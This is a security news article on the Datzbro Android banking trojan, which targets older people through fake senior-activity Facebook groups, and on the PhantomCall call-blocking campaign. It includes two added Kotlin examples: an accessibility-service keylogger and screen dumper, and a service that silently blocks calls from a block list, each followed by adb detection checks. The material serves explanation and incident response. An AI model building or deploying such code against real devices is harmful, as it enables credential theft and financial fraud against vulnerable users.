Cybersecurity researchers uncovered a previously undocumented Android banking trojan called Datzbro, which conducts device takeover (DTO) attacks and performs fraudulent transactions by preying on older people.
Dutch mobile security company ThreatFabric discovered the campaign in August 2025 after users in Australia reported scammers running Facebook groups that promoted “active senior trips.” The threat actors have since expanded their reach to Singapore, Malaysia, Canada, South Africa, and the U.K.
The campaigns specifically targeted older people searching for social activities, trips, in-person meetings, and similar events. To lure victims, these Facebook groups shared artificial intelligence (AI)-generated content and claimed to organize senior-friendly activities. When prospective targets showed interest, scammers quickly contacted them through Facebook Messenger or WhatsApp and persuaded them to download an APK file from a fraudulent link (e.g., “download.seniorgroupapps[.]com”).
“The fake websites prompted visitors to install a so-called community application, claiming it would allow them to register for events, connect with members, and track scheduled activities,” ThreatFabric said in a report shared with The Hacker News.
The websites also included placeholder links for downloading an iOS application, which indicates that the attackers intended to target both major mobile operating systems. On the iOS side, they distributed TestFlight builds and tricked victims into installing them.
When victims clicked the button to download the Android application, the link either directly deployed the malware or installed a dropper built with an APK binding service called Zombinder, which bypasses security restrictions on Android 13 and later.
Researchers identified several Android apps distributing Datzbro, including:
- Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
- Lively Years (orgLivelyYears.browses646)
- ActiveSenior (com.forest481.security)
- DanceWave (inedpnok.kfxuvnie.mggfqzhl)
- 作业帮 (Zuoyebang) (io.mobile.Itool)
- 麻豆传媒 (Madou Media) (fsxhibqhbh.hlyzqkd.aois)
- 麻豆传媒 (Madou Media) (mobi.audio.aassistant)
- 谷歌浏览器 (Google Chrome) (tvmhnrvsp.zltixkpp.mdok)
- MT管理器 (MT Manager) (varuhphk.vadneozj.tltldo)
- MT管理器 (MT Manager) (spvojpr.bkkhxobj.twfwf)
- 大麦 (Damai) (mnamrdrefa.edldylo.zish)
- MT管理器 (MT Manager) (io.red.studio.tracker)
Like other Android banking trojans, Datzbro carries extensive capabilities. It records audio, captures photos, accesses files and images, and enables financial fraud through remote control, overlay attacks, and keylogging. It abuses Android’s accessibility services, a legitimate feature rather than a vulnerability, to execute remote actions on the victim’s behalf.
A notable feature of Datzbro lies in its schematic remote control mode. This capability allows the malware to transmit details about all on-screen elements, including their position and content, so operators can re-create the layout on their end and take full control of the device.
In addition, the banking trojan disguises malicious activity with a semi-transparent black overlay containing custom text. It also steals lock screen PINs, along with passwords linked to Alipay and WeChat. Furthermore, Datzbro scans accessibility event logs to detect package names tied to banks or cryptocurrency wallets, as well as text strings containing passwords, PINs, or other sensitive codes.
“Such a filter clearly shows the focus of the developers behind Datzbro, not only using its Spyware capabilities, but also turning it into a financial threat,” ThreatFabric said. “With the help of keylogging capabilities, Datzbro can successfully capture login credentials for mobile banking applications entered by unsuspecting victims.”
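The two accessibility-service features described above, the package and keyword filter and the "schematic" dump of every on-screen node with its position and content, map onto ordinary Android APIs. The following Kotlin service is an added illustration written for this page, not code from Datzbro or from ThreatFabric's report; the watched package names and the keyword list are placeholders. The snapshot is only logged locally, where a real sample would ship it to its operator.

```kotlin
import android.accessibilityservice.AccessibilityService
import android.graphics.Rect
import android.util.Log
import android.view.accessibility.AccessibilityEvent
import android.view.accessibility.AccessibilityNodeInfo
import org.json.JSONArray
import org.json.JSONObject

// Added illustration, not Datzbro's code. The service must be declared in the manifest
// with android.permission.BIND_ACCESSIBILITY_SERVICE, its accessibility-service XML must
// set canRetrieveWindowContent="true" (otherwise rootInActiveWindow is null), and the
// user has to enable it under Settings > Accessibility.
class SchematicService : AccessibilityService() {

    // Hypothetical watch list; these package names are placeholders, not real targets.
    private val targetPackages = setOf("com.example.bank", "com.example.wallet")
    private val sensitiveText = Regex("(?i)\\b(password|passcode|pin|otp)\\b")

    override fun onAccessibilityEvent(event: AccessibilityEvent) {
        val pkg = event.packageName?.toString() ?: return
        val text = event.text.joinToString(" ")

        // The filter: react only to watched apps or to credential-looking text.
        if (pkg !in targetPackages && !sensitiveText.containsMatchIn(text)) return

        // Keylogging-style capture: text-changed events carry what was typed.
        if (event.eventType == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
            Log.d(TAG, "typed in $pkg: $text")
        }

        // The "schematic": every node with its class, content and screen bounds,
        // which is all an operator console needs to redraw the screen and pick a
        // node to click. Logged here instead of being sent to a C2.
        rootInActiveWindow?.let { Log.d(TAG, snapshot(it).toString()) }
    }

    // Depth-first walk of the node tree into a flat JSON array.
    private fun snapshot(root: AccessibilityNodeInfo): JSONArray {
        val out = JSONArray()
        val stack = ArrayDeque<AccessibilityNodeInfo>().apply { add(root) }
        val rect = Rect()
        while (stack.isNotEmpty()) {
            val node = stack.removeLast()
            node.getBoundsInScreen(rect)
            out.put(JSONObject().apply {
                put("class", node.className?.toString())
                put("text", node.text?.toString())
                put("desc", node.contentDescription?.toString())
                put("clickable", node.isClickable)
                put("bounds", JSONArray(listOf(rect.left, rect.top, rect.right, rect.bottom)))
            })
            for (i in 0 until node.childCount) node.getChild(i)?.let { stack.add(it) }
        }
        return out
    }

    override fun onInterrupt() {}

    private companion object { const val TAG = "schematic" }
}
```

The practical check for a responder follows from the requirements in the comment: nothing in this class runs until the service has been enabled by the user, so on a suspect device `adb shell settings get secure enabled_accessibility_services` lists every accessibility service that is currently active, and any entry from a sideloaded package is worth inspecting.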
Datzbro creators
Evidence suggests that a Chinese-speaking threat group developed Datzbro. Researchers reached this conclusion after finding Chinese debug and logging strings embedded in the malware’s source code. Unlike other malware families that rely on web-based C2 panels, Datzbro’s malicious apps connect to a command-and-control (C2) backend designed as a Chinese-language desktop application.
ThreatFabric noted that a compiled version of the C2 app surfaced on a public virus-sharing platform, which suggests someone leaked the malware and made it freely available to cybercriminals.
“The discovery of Datzbro highlights the evolution of mobile threats targeting unsuspecting users through social engineering campaigns,” the company said. “By focusing on seniors, fraudsters exploit trust and community-oriented activities to lure victims into installing malware. What begins as a seemingly harmless event promotion on Facebook can escalate into device takeover, credential theft, and financial fraud.”
Meanwhile, IBM X-Force disclosed an Android banking malware campaign known as PhantomCall, part of the AntiDot malware family. The campaign targeted customers of major financial institutions in Spain, Italy, France, the U.S., Canada, the U.A.E., and India by spreading fake Google Chrome dropper apps. These droppers bypass the Android 13 restrictions that normally prevent sideloaded apps from abusing accessibility APIs.
According to a June 2025 analysis by PRODAFT, AntiDot belongs to a financially motivated threat actor tracked as LARVA-398. The group offers the malware under a malware-as-a-service (MaaS) model across underground forums.
The latest PhantomCall campaign leverages the CallScreeningService API to monitor incoming calls and selectively block them based on a dynamically generated list of numbers stored in the device’s shared preferences. By doing so, attackers prolong unauthorized access, finalize fraudulent transactions, and delay detection.
“PhantomCall also enables attackers to initiate fraudulent activity by silently sending USSD codes to redirect calls, while abusing Android’s CallScreeningService to block legitimate incoming calls, effectively isolating victims and enabling impersonation,” security researcher Ruby Cohen said.
“These capabilities play a critical role in orchestrating high-impact financial fraud by cutting off victims from real communication channels and enabling attackers to act on their behalf without raising suspicion.”
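The call-blocking mechanism described above is the documented CallScreeningService API, normally used by spam blockers. The Kotlin service below is an added illustration for this page, not PhantomCall's or AntiDot's code, and shows the shape of such an abuse: the block list lives in SharedPreferences so it can be rewritten at any time, and a matching incoming call is rejected with no ring, no notification and no call-log entry. The preference file and key names are assumptions.

```kotlin
import android.content.Context
import android.telecom.Call
import android.telecom.CallScreeningService

// Added illustration, not PhantomCall's code. The service must be declared in the
// manifest with android.permission.BIND_SCREENING_SERVICE and an intent filter for
// android.telecom.CallScreeningService. Since Android 10, onScreenCall() is only
// delivered to the app that holds RoleManager.ROLE_CALL_SCREENING, which the user
// must grant through a system dialog.
class BlockListScreeningService : CallScreeningService() {

    override fun onScreenCall(callDetails: Call.Details) {
        // Only incoming calls are of interest; everything else passes through untouched.
        if (callDetails.callDirection != Call.Details.DIRECTION_INCOMING) {
            respondToCall(callDetails, CallScreeningService.CallResponse.Builder().build())
            return
        }

        // The handle is a "tel:" URI; schemeSpecificPart is the dialled number, e.g. "+15551234567".
        val number = callDetails.handle?.schemeSpecificPart ?: ""

        // The block list is read on every call, so whatever was last written wins.
        val blocked = getSharedPreferences(PREFS, Context.MODE_PRIVATE)
            .getStringSet(KEY_BLOCKED, emptySet()) ?: emptySet()

        val response = if (number in blocked) {
            // Silent rejection: setSkipCallLog/setSkipNotification are only valid
            // together with setDisallowCall(true).
            CallScreeningService.CallResponse.Builder()
                .setDisallowCall(true)
                .setRejectCall(true)
                .setSkipCallLog(true)
                .setSkipNotification(true)
                .build()
        } else {
            CallScreeningService.CallResponse.Builder().build()  // let the call ring normally
        }
        respondToCall(callDetails, response)
    }

    companion object {
        private const val PREFS = "screening"          // hypothetical preference file
        private const val KEY_BLOCKED = "blocked_numbers"  // hypothetical key

        // The "dynamically generated" part: any component (a C2 handler, for instance)
        // can replace the list without touching the service itself.
        fun updateBlockList(ctx: Context, numbers: Set<String>) {
            ctx.getSharedPreferences(PREFS, Context.MODE_PRIVATE)
                .edit()
                .putStringSet(KEY_BLOCKED, numbers)
                .apply()
        }
    }
}
```

Because the role grant is the gate, it is also the artefact to look for: `adb shell dumpsys role` lists the current holder of `android.app.role.CALL_SCREENING`, and a sideloaded package holding that role while the victim reports missed calls from their bank is the condition this campaign depends on.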
Source: TheHackerNews